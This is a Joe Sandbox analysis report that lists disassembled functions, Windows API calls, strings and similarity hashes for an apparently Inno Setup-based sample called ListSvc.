Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
String ID: .dat$.msg$IMsg$Uninstall
API String ID: 3312786188-1660910688
Opcode ID: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
Instruction ID: 43941ce92546cf1f75effb4615d96ab71b8b1f254b2d248514a95b56d5af6042
Opcode Fuzzy Hash: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
Instruction Fuzzy Hash: 65415CB0A002059FC700EFA4CD96E9EBBB6FB88304F51846AF400A7751DB75AE41DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 006153AC, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 006153C6
SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00615463

Strings

Failed to create DebugClientWnd, xrefs: 0061542C
hSa, xrefs: 00615415
Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 006153F2

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: MessageSend
String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd$hSa
API String ID: 3850602802-2905362044
Opcode ID: 0e412e84a358142af428e011a0e255765662ed08f503d990aefe787644027a64
Instruction ID: bd2b79d17f40968884fe1c372ced24de8c60c917dea0cb25488337d16b2a65e4
Opcode Fuzzy Hash: 0e412e84a358142af428e011a0e255765662ed08f503d990aefe787644027a64
Instruction Fuzzy Hash: 391123B1A403129FE300EB28DC81FDABBD69F94304F08002AF5858B3D2D3749C84C766

Uniqueness

Uniqueness Score: -1.00%

Function 00624AA4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32 ref: 00624AD6
GetExitCodeProcess.KERNEL32 ref: 00624AF9
CloseHandle.KERNEL32(?,00624B2C,00000001,00000000,000000FF,000004FF,00000000,00624B25), ref: 00624B1F

Strings

MsgWaitForMultipleObjects, xrefs: 00624AE5
GetExitCodeProcess, xrefs: 00624B02

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CloseCodeExitHandleMultipleObjectsProcessWait
String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
API String ID: 2573145106-3235461205
Opcode ID: 5a47b888b64c9d71a21df3ce652ab4a6790a840d61fbcb63caf85f52caaf36c3
Instruction ID: b445045a4a45572890d55b61ba1fda7f57045845c9b5a3357f52015174d7dfc9
Opcode Fuzzy Hash: 5a47b888b64c9d71a21df3ce652ab4a6790a840d61fbcb63caf85f52caaf36c3
Instruction Fuzzy Hash: CE01A234640605AFD710EFA8ED62E9977EAEB49721F200265F520D73D0DE74ED44CA19

Uniqueness

Uniqueness Score: -1.00%

Function 004070B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D

Strings

:, xrefs: 004070CC

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
Instruction ID: 4e46778bef482c884a40b6a77bd37b1cdf5980326a29a022de95e28d89e8e0a5
Opcode Fuzzy Hash: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
Instruction Fuzzy Hash: 71F0627154474465D310E7658852BDB729CDF84348F04843E76C89B2D1E6BC5948979B

Uniqueness

Uniqueness Score: -1.00%

Function 0059BDE0, Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
Instruction ID: f6f51fa323c2004b4ed4a12cf3aa4c02228d8e81e9c13bd86265522dc6499af0
Opcode Fuzzy Hash: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
Instruction Fuzzy Hash: B01172A160425956FF706A7A6F09BEA3F9C7FD1745F050429BE419B283CB38CC458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00423A20, Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A70

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
String ID:
API String ID: 2814369299-0
Opcode ID: df722b0e1309f9a81f5fce9d005c1b6d287d6fd7d419b4baf17ebfa420ffd0ff
Instruction ID: b6ddb16581f5c3c7179c90d7d3f79c6d55466118c1baf1b24a27a0798ed1e7de
Opcode Fuzzy Hash: df722b0e1309f9a81f5fce9d005c1b6d287d6fd7d419b4baf17ebfa420ffd0ff
Instruction Fuzzy Hash: FAF0A7613803241999203DBE28C9ABF115CC9427AFB54077FF994D22D2D62D5F87415D

Uniqueness

Uniqueness Score: -1.00%

Function 005B631C, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
SetEvent.KERNEL32(00000000), ref: 005B635A
GetCurrentThreadId.KERNEL32 ref: 005B635F
MsgWaitForMultipleObjects.USER32 ref: 005B6388
CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
String ID:
API String ID: 2132507429-0
Opcode ID: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
Instruction ID: 777aa0f60006170efd8bf97b8faec0e2cbbea874aebe53a0ac6f8c30ff2fdbbe
Opcode Fuzzy Hash: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
Instruction Fuzzy Hash: 30018B70A09700EED700EB65DC45BAE37E9FB44715F604A2AF055C75D0DB38A480CB42

Uniqueness

Uniqueness Score: -1.00%

Function 006B8F64, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE,?,?), ref: 006B8FD4
SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE), ref: 006B8FFD
MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000), ref: 006B9016

Strings

isRS-%.3u.tmp, xrefs: 006B8FB3

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: File$Attributes$Move
String ID: isRS-%.3u.tmp
API String ID: 3839737484-3657609586
Opcode ID: 8d4268528f0551a281f2f3f55997a38572bb3cbe4dffdc26fb30d28ba37c9b4b
Instruction ID: 31d351f3c97924346b89867796ea0414510024315a00da88274a448b23120628
Opcode Fuzzy Hash: 8d4268528f0551a281f2f3f55997a38572bb3cbe4dffdc26fb30d28ba37c9b4b
Instruction Fuzzy Hash: AB318170D04218ABCB00EBB9C8859EEB7B9EF48314F51467EF814B7281D7385E818769

Uniqueness

Uniqueness Score: -1.00%

Function 006B6998, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 006B6A05
CloseHandle.KERNEL32(006B6AB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B6A6C,?,006B6A5C,00000000), ref: 006B6A22

Part of subcall function 006B68EC: GetLastError.KERNEL32(00000000,006B6989,?,?,?), ref: 006B690F

Strings

D, xrefs: 006B69DF
(\m, xrefs: 006B6A0E

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CloseCreateErrorHandleLastProcess
String ID: (\m$D
API String ID: 3798668922-1981685662
Opcode ID: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
Instruction ID: 5a29f4a3f67f8962990b16f59edcecd6c92ec2fdb2b6e45770094aa6b13b7383
Opcode Fuzzy Hash: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
Instruction Fuzzy Hash: 53115EB1604248AFDB00EBA5CC92EEE77ADEF08704F51407AF505F7281E678AE448768

Uniqueness

Uniqueness Score: -1.00%

Function 0062460C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005C52C8: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D579C,00000000,0060D8F7,00000000,0060DBD2,?,?,006D579C), ref: 005C52F9

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062464F
RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0062466B

Strings

RegisterTypeLib, xrefs: 00624676
LoadTypeLib, xrefs: 0062465A

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Type$FullLoadNamePathRegister
String ID: LoadTypeLib$RegisterTypeLib
API String ID: 4170313675-2435364021
Opcode ID: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
Instruction ID: a0643c8b31b351ed7dd0ed5e96a0399ab73b0cd2583ebe073036f576505b33dd
Opcode Fuzzy Hash: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
Instruction Fuzzy Hash: 2D0148317407146BDB10EBB6DC82F8E77EDDB49704F514876B400F62D2DE78AE058A58

Uniqueness

Uniqueness Score: -1.00%

Function 0060DAE9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41fileCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060DAF4

Part of subcall function 00423A20: DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
Part of subcall function 00423A20: GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
Part of subcall function 00423A20: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
Part of subcall function 00423A20: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62

MoveFileW.KERNEL32(00000000,00000000), ref: 0060DB21

Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87

Strings

DeleteFile, xrefs: 0060DB05
MoveFile, xrefs: 0060DB2A

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
String ID: DeleteFile$MoveFile
API String ID: 3947864702-139070271
Opcode ID: 69906e1fa498f448b67ec90ed8193f3809713f06cd0179ef74a02e782715ba36
Instruction ID: fe212bc12655be3e3d7d94ed230904773b29f806c55adb2c37bf9887ca86c235
Opcode Fuzzy Hash: 69906e1fa498f448b67ec90ed8193f3809713f06cd0179ef74a02e782715ba36
Instruction Fuzzy Hash: 62F044706841058AEB08FBF6E9069AF73A5EF44318F51467EF404E72C1DA3C9C05862D

Uniqueness

Uniqueness Score: -1.00%

Function 005C86E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C86FA

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Part of subcall function 005C8644: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B

ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C872B

Strings

ChangeWindowMessageFilterEx, xrefs: 005C86F0
user32.dll, xrefs: 005C86F5

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: HandleModule$AddressChangeFilterMessageProcWindow
String ID: ChangeWindowMessageFilterEx$user32.dll
API String ID: 989041661-2676053874
Opcode ID: 069d2c8e1b8fc22a779199f9f95faad227b90f375a0982a66332104caa2a493e
Instruction ID: 33574298acf09a9ab3b8dc906f6acd80ea038e69245e9512450f7745a5549cab
Opcode Fuzzy Hash: 069d2c8e1b8fc22a779199f9f95faad227b90f375a0982a66332104caa2a493e
Instruction Fuzzy Hash: F7F0A070702610DFD715EBA9AC89F662FE6EB84345F30142EF1069B691DBB60880C699

Uniqueness

Uniqueness Score: -1.00%

Function 004698FC, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 0046998A

Part of subcall function 004236A4: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D4C,004699CC,00000000,00469A4C,?,?,00443D4C), ref: 004236F3

Part of subcall function 00423BD0: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D4C,004699E7,00000000,00469A4C,?,?,00443D4C,00000001), ref: 00423BF3

GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 004699F1

Part of subcall function 00427D54: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427D78
Part of subcall function 00427D54: LocalFree.KERNEL32(00000001,00427DD1,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427DC4

Strings

dUA, xrefs: 00469A10
\UA, xrefs: 004699A9

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
String ID: \UA$dUA
API String ID: 503893064-3864016770
Opcode ID: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
Instruction ID: 123e0454fb2a9dec89cd9e8203dbd653fcf04e778e7e37e714b9737e464d7bf3
Opcode Fuzzy Hash: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
Instruction Fuzzy Hash: 8641A370B002599FDB00EFA6C8815EEBBF5AF58314F40812AE914A7382D77D5E05CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE74, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON

Download Yara Rule

APIs

GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73

Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
